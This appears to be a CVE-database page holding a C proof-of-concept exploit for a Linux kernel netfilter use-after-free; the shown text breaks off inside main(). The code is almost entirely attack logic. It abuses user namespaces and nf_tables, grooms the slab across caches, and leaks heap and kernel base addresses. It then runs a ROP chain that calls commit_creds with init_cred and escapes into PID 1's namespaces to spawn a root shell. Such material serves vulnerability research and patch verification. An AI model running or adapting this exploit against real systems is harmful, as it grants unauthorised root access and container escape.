4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.c C
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netfilter_ipv4.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "./helpers.h"
#include "./helpers_nfqueue.h"

#define NFT_NOTRACK_OPS 0x1d430a0
#define INIT_NSPROXY 0x2876900
#define COMMIT_CREDS 0x01d4400
#define FIND_TASK_BY_VPID 0x01cab70
#define SWITCH_TASK_NAMESPACES 0x01d2880
#define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset
#define INIT_CRED 0x2876b40

#define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286   // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf]
#define POP_RSP_R13_R14_R15_RET 0x01f1afb             // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret
#define POP_RDI_RET 0x00dd45d                         // pop rdi ; ret
#define POP_RSI_RET 0x026d67e                         // pop rsi ; ret
#define POP_RDX_RET 0x0228ce2                         // pop rdx ; ret
#define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret

#define UDP_PORT 56789
#define QUEUE_NUM 2

// This enum is used by queue points to determine which packet should be queued.
enum signal_for_queue {
    SIGNAL_SPRAY,               // queue spray packet
    SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet
    SIGNAL_TMP_TMPL_NF_CONN     // queue temporary template nf_conn packet
};

#define UDP_HEADER_SIZE 8
#define SLAB_CHUNK_SIZE_256 256
#define IPS_CONFIRMED_BIT 3

// CROSS CACHE PARAMS
#define OBJ_PER_SLAB_256 16
#define CPU_PARTIALS_SLABS_256 7
#define MIN_PARTIAL_256 5

#define CROSS_CACHE_DEFRAGMENTATION_SIZE 200
#define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256))
#define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256)
#define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1)
#define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256))

int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE];
int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE];
int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE];
int spray_cross_cache_post[CROSS_CACHE_POST_SIZE];
int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE];

// SPRAY PARAMS
#define SPRAY_BATCHES 32
#define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks
#define SPRAY_BATCH_SIZE 32

// SIZE AND OFFSETS
#define NFT_RULE_SIZE 0x18
#define NFT_EXPR_SIZE 0x8
#define NFT_LOG_SIZE 0x18

#define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata)
#define NF_CONN_OFFS_CT_GENERAL 0x0
#define NF_CONN_OFFS_CT_STATUS 0x80
#define NF_CONN_OFFS_CT_NET 0x88
#define NF_CONN_OFFS_NAT_BYSOURCE 0x90
#define NF_CONN_OFFS_EXT 0xb0

#define NET_OFFS_CT 0x9c0
#define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10

#define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28

// nf_ct_ext
#define NF_CT_EXT_NUM 9
#define NF_CT_EXT_LABELS 7

struct nf_ct_ext {
    uint8_t offset[NF_CT_EXT_NUM];
    uint8_t len;
    unsigned int gen_id;
    char data[];
};

#define BATCH_BUFFER_SIZE 1048576                                        // 1M buffer should be enough
#define NUMBER_OF_NOTRACK_EXPRS 13                                       // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset.
#define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule
#define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8                       // offset 0xc8 of nft_rule <=> expr->ops->deactivate

sock nlsock;
const uint16_t family = NFPROTO_IPV4;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0;

char buf[0xffff]; // general purpose buf

// id of the packet in netfilter queue
uint32_t packet_id_first_nf_conn;
uint32_t packet_id_second_nf_conn;
// handle of the nft_rule that re-use the memmory dangling in nf_nat_bysource list (original owned by the first nf_conn)
uint64_t rule_handle_first_nf_conn;

const char base_table[] = "base_table";
const char table_spray_name[] = "table_spray_name";
const char chain_spray_name[] = "chain_spray_name";

void save_state() {
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;");
}

void after_privesc_as_root() {
    INFO("Returned to userland");

    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
    setns(open("/proc/1/ns/net", O_RDONLY), 0);

    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);
}

void write_to_file(const char *which, const char *format, ...) {
    FILE *fu = fopen(which, "w");
    va_list args;
    va_start(args, format);
    if (vfprintf(fu, format, args) < 0) {
        ERROR("cannot write");
        exit(1);
    }
    fclose(fu);
}

int loopback_up() {
    struct ifreq ifr;
    int sockfd;

    // Create a socket to perform ioctl operations
    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("Socket creation failed");
        return 1;
    }

    // Specify the interface name ("lo" for loopback)
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);

    // Get the current flags for the interface
    if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) {
        perror("Failed to get interface flags");
        close(sockfd);
        return 1;
    }

    // Set the IFF_UP flag to bring the interface up
    ifr.ifr_flags |= IFF_UP;

    // Apply the new flags to the interface
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
        perror("Failed to set interface flags");
        close(sockfd);
        return 1;
    }

    INFO("Loopback interface 'lo' is now up.");
    close(sockfd);
    return 0;
}

int setup(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();

    // In order to use nf_tables, we need CAP_NET_ADMIN
    INFO("Setting up user namespace");
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
        ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)");
        return -1;
    }

    INFO("Pinning process to CPU #0");
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
        ERROR("sched_setaffinity");
        return -1;
    }

    // now we map uid and gid
    write_to_file("/proc/self/uid_map", "0 %d 1", uid);
    // deny setgroups (see user_namespaces(7))
    write_to_file("/proc/self/setgroups", "deny");
    // remap gid
    write_to_file("/proc/self/gid_map", "0 %d 1", gid);

    loopback_up();

    return 0;
}

int setup_nft_base_table() {
    table t = make_table(base_table, family, NULL, 0);
    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_table(b, t, family);
    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int vuln_setup() {
    char c_pre_conntrack_name[] = "pre_conntrack_chain";
    char c_post_conntrack_name[] = "post_conntrack_chain";

    chain c_pre_conntrack = make_chain(base_table, c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL);
    expr e_notrack = make_notrack_expr();
    rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0);

    chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL);
    expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00);
    rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_new_chain(b, c_pre_conntrack, family);
    batch_new_chain(b, c_post_conntrack, family);
    batch_new_rule(b, r_pre_conntrack, family);
    batch_new_rule(b, r_post_conntrack, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int register_base_nat_chain() {
    // The hooknum can be any valid Netfilter hook
    chain c_nat = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat");

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_chain(b, c_nat, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

// Register a chain with a rule that queues packets based on the first byte of their payload
int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) {
    chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL);

    expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00);
    expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare);
    expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0);

    expr list_e[3] = {e_payload, e_cmp, e_queue};
    rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_new_chain(b, c, family);
    batch_new_rule(b, r, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

void update_labels_to_overwrites_ops() {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct nlattr *nest;

    // Release the packet from the "nf_conn_queue_point_2" queue point.
    nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM);
    nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT);

    uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256;

    uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE;
    uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS;

    uint8_t cta_labels[16] = {0};
    uint8_t cta_masks[16] = {0};

    *(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr;

    nest = mnl_attr_nest_start(nlh, NFQA_CT);
    mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels);
    mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks);
    mnl_attr_nest_end(nlh, nest);

    if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) {
        perror("mnl_socket_send");
        exit(EXIT_FAILURE);
    }

    // This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed.
}

void send_udp_packet(uint8_t first_byte) {
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

    struct sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(UDP_PORT);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");

    sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr));
    close(sock);
}

int setup_chain_to_spray_nft_rule() {
    table t_spray = make_table(table_spray_name, family, NULL, 0);
    chain c_spray = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_new_table(b, t_spray, family);
    batch_new_chain(b, c_spray, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int alloc_nf_conn() {
    // send a packet to alloc a temporary template nf_conn in the function `nft_ct_set_zone_eval()`
    // this template nf_conn stays alive until the user sends a DROP verdict to drop the packet
    send_udp_packet(SIGNAL_SPRAY);

    int id_in_queue = queue_recv(queue_get_id_cb); // recv the packet at "before_nat_chain" queue point
    return id_in_queue;
}

#define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2
#define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1)

int dump_exprs(const struct nlmsghdr *nlh, void *data) {
    rule r = nftnl_rule_alloc();
    nftnl_rule_nlmsg_parse(nlh, r);

    struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r);

    // Skip notrack exprs
    for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++)
        nftnl_expr_iter_next(iter);

    // Retrieve the content of the prefix field
    const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX);

    if (leaked) {
        leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE;
        INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr);
    }

    nftnl_expr_iter_destroy(iter);
    nftnl_rule_free(r);

    return MNL_CB_OK;
}

int leak_heap_first_tmpl_nf_conn() {
    char buf[MNL_SOCKET_BUFFER_SIZE];
    rule r;
    nlmsghdr hdr;

    // One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn.
    for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) {
        r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
        rseq = seq;
        hdr = dump_rule(r, buf, family);
        nftnl_rule_free(r);

        if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) {
            ERROR("mnl_socket_sendto");
            return -1;
        }
        if (run_callbacks(nlsock, dump_exprs, NULL) < 0) {
            ERROR("run_callbacks leak_heap: primitive");
            return -1;
        }

        if (leaked_first_tmpl_nf_conn_addr) {
            rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk.
            return 0;
        }
    }
    return -1;
}

int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) {
    struct nfqnl_msg_packet_hdr *ph = NULL;
    char *ct_ext;
    struct nlattr *attr[NFQA_MAX + 1] = {};

    if (nfq_nlmsg_parse(nlh, attr) < 0) {
        perror("problems parsing");
        return MNL_CB_ERROR;
    }

    ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]);
    ct_ext = mnl_attr_get_payload(attr[NFQA_CT]);

    packet_id_second_nf_conn = ntohl(ph->packet_id);

    // 0x4c is the offset of the labels data inside the received payload.
    // Use a hard-coded offset to quickly retrieve the value.
    vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS;
    INFO("Leaked vmlinux: 0x%lx", vmlinux);

    return MNL_CB_OK;
}

int leak_kaslr() {
    // The second template nf_conn is now completely under attacker control.
    // Release the packet from the "nf_conn_queue_point_1" queue point.
    nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT);

    INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped");
    queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point

    return 0;
}

int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() {
    int table_spray_counter = 0;

    char udata[SLAB_CHUNK_SIZE_256] = {0};
    struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET];
    fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule
    fake_nf_ct_ext->len = 0;
    fake_nf_ct_ext->gen_id = 0;

    for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
            char table_name[32];
            sprintf(table_name, "tsrp-1-%d", table_spray_counter++);
            table t = make_table(table_name, family, udata, sizeof(udata));
            batch_new_table(b, t, family);
            nftnl_table_free(t);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int del_target_rule(uint32_t handle) {
    rule r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);

    batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);

    batch_del_rule(b, r, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

int update_adjacent_nft_rule_udata_with_ROP() {
    // The only way to update the udata of an nft_rule is to free the rule and spray again.

    // 1. Free adjacent nft_rule
    // Calculate the handle range for the adj nft_rules
    int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1);
    lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle;
    int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1);
    upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle;

    for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) {
        if (handle == rule_handle_first_nf_conn)
            continue;

        del_target_rule(handle);
    }

    // @sleep(kernel_func="nft_commit_release",
    //        desc="wait for adjacent nft_rule to be freed")
    usleep(100 * 1000);

    // 2. Spray nft_rules with udata containing the ROP chain.
    const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata);
    char udata[udata_len];
    memset(udata, 0, udata_len);

    // the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there
    *(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET;

    uint64_t *rop = (uint64_t *)&udata[0x10];

    // commit_creds(&init_cred)
    *rop++ = vmlinux + POP_RDI_RET;
    *rop++ = vmlinux + INIT_CRED;
    *rop++ = vmlinux + COMMIT_CREDS;

    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
    *rop++ = vmlinux + POP_RDI_RET;
    *rop++ = 1;
    *rop++ = vmlinux + FIND_TASK_BY_VPID;
    *rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET;
    *rop++ = 0;
    *rop++ = vmlinux + POP_RSI_RET;
    *rop++ = vmlinux + INIT_NSPROXY;
    *rop++ = vmlinux + SWITCH_TASK_NAMESPACES;

    // return to userspace
    *rop++ = vmlinux + KPTI_TRAMPOLINE;
    rop++;
    rop++;

    *rop++ = (uint64_t)after_privesc_as_root;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    // jop gadget, put here because this space is unused. rsi is pointing to fake_expr
    // we can use either of the following, they are equivalent
    *rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
    // or
    #define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE)
    *(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
    // It’s okay to comment out either one of the two.

    expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later.

    // Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned.
    rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0);

    for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
            batch_new_rule(b, r, family);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() {
    int table_spray_counter = 0;
    char fake_nf_conn[256] = {0};

    *(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1

    // set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update()
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT;

    // prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()`
    // Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr).
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB);

    // Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk.
    *(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET;

    for (int i = 0; i < SPRAY_BATCHES; ++i) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
            char table_name[32];
            sprintf(table_name, "tsrp-2-%d", table_spray_counter++);
            table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn));
            batch_new_table(b, t, family);
            nftnl_table_free(t);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int escalate() {
    batch b;

    rule del_rule = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0);
    b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
    batch_del_rule(b, del_rule, family);

    return batch_send_and_run_callbacks(b, nlsock, NULL);
}

void spray_cross_cache_pre_alloc() {
    // 1. DEFRAG kmalloc-256
    for (int i = 0; i < CROSS_CACHE_DEFRAGMENTATION_SIZE; i++) {
        spray_cross_cache_defragment[i] = alloc_nf_conn();
    }
    // 2. pre pre allocate
    for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
        spray_cross_cache_pre_pre[i] = alloc_nf_conn();
    }
    // 3. pre allocate
    for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
        spray_cross_cache_pre[i] = alloc_nf_conn();
    }
}

// alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc()

void spray_cross_cache_post_alloc() {
    // 5. post allocate
    for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
        spray_cross_cache_post[i] = alloc_nf_conn();
    }

    // 6. post post allocate
    for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
        spray_cross_cache_post_post[i] = alloc_nf_conn();
    }
}

void cross_cache_pre_free() {
    // 7. pre pre free
    for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[i], NF_DROP);
    }

    // 8. pre free
    for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[i], NF_DROP);
    }
}

// free target between cross_cache_pre_free() and cross_cache_post_free()

void cross_cache_post_free() {
    // 9. post free
    for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[i], NF_DROP);
    }

    // 11. post post free
    for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
        nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[i], NF_DROP);
    }
}

int spray_nft_rule_kmalloc_cg_256() {
    const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression
    int udata_size = SLAB_CHUNK_SIZE_256;                    // craft a rule in cache 256
    udata_size -= NFT_RULE_SIZE;
    udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data.
    udata_size -= NFT_LOG_SIZE;                    // nft_log expression has private data
    udata_size -= sizeof(struct nft_userdata);

    char udata[udata_size];
    memset(udata, 0, udata_size);

    expr list_e[number_of_exprs];

    // notrack exprs are used as padding for nft_log
    for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) {
        list_e[i] = make_notrack_expr();
    }

    expr e_log = make_log_expr(NULL);
    list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write.

    rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0);

    for (int i = 0; i < SPRAY_BATCHES; i++) {
        batch b = batch_init(BATCH_BUFFER_SIZE);
        for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
            batch_new_rule(b, r, family);
        }
        if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
            return -1;
    }

    return 0;
}

int setup_netfilter() {
    INFO("Creating netfilter netlink socket");
    if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) {
        ERROR("mnl_socket_open(): nlsock");
        return -1;
    }
    if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) {
        ERROR("mnl_socket_bind");
        return -1;
    }

    setup_nf_queue();
    setup_nft_base_table();
    vuln_setup();

    // "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive.
    register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY);
    register_base_nat_chain();
    // The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability.
    register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN);
    register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN);
    register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN);

    // "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval().
    // Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed().
    // Register this queue point after `nf_confirm()` function.
    register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN);

    setup_chain_to_spray_nft_rule();

    return 0;
}

int main() {
    save_state();

    if (setup() == -1)
        return -1;

    setup_netfilter();

    send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet
    queue_recv(NULL);                            // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn.

    INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)");
    spray_cross_cache_pre_alloc();

    INFO("Allocate the first template nf_conn + link it to nf_nat_bysource");
    send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);              // attach temporary template nf_conn to this packet
    packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point

    spray_cross_cache_post_alloc();
    cross_cache_pre_free();

    INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table");
    nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP);

    cross_cache_post_free();

    INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)");
    spray_nft_rule_kmalloc_cg_256();
    INFO("I: end CROSS CACHE");

    INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)");
    spray_cross_cache_pre_alloc();

    INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write");
    send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);
    packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
    leak_heap_first_tmpl_nf_conn();

    spray_cross_cache_post_alloc();
    cross_cache_pre_free();

    // Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn.
    INFO("Free nft_rule => free second template nf_conn");
    del_target_rule(rule_handle_first_nf_conn);
    // @sleep(kernel_func="nft_commit_release",
    //        desc="wait for victim rule to be freed")
    usleep(100 * 1000);

    INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)");
    spray_nft_tables_udata_kmalloc_cg_256_fake_ext();

